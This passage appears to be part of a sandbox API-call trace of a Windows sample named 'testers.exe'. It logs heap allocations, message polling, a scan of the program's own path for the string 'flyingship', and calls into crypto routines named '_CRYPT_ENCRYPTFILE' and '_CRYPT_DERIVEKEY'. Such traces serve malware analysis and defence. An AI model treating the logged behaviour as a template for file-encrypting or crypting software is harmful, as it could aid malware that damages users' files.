lpString2="no", cchCount2=2) returned 2 [0167.161] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0167.161] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0167.161] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.161] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0167.161] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.162] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0167.162] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.163] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0167.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0167.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0167.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0167.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="testers.exe", cAlternateFileName="")) returned 0x90add8 [0167.165] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0167.165] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0167.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0167.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0167.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0167.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0167.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="testers.exe", cAlternateFileName="")) returned 0x90add8 [0167.166] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0167.166] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0167.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0167.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="testers.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esters.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sters.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.168] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.168] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0167.168] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0167.168] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0167.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0167.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.169] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0167.169] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0167.169] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0167.169] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0167.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0167.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="testers.exe", cAlternateFileName="")) returned 0x90ae18 [0167.170] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0167.170] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0167.170] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.170] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0167.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.170] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0167.170] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.170] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0167.170] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.170] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0167.171] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.171] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.171] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.171] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.171] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0167.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.171] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0167.172] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.173] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0167.173] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.173] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.173] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0167.173] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.173] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.173] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.173] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.174] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.174] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 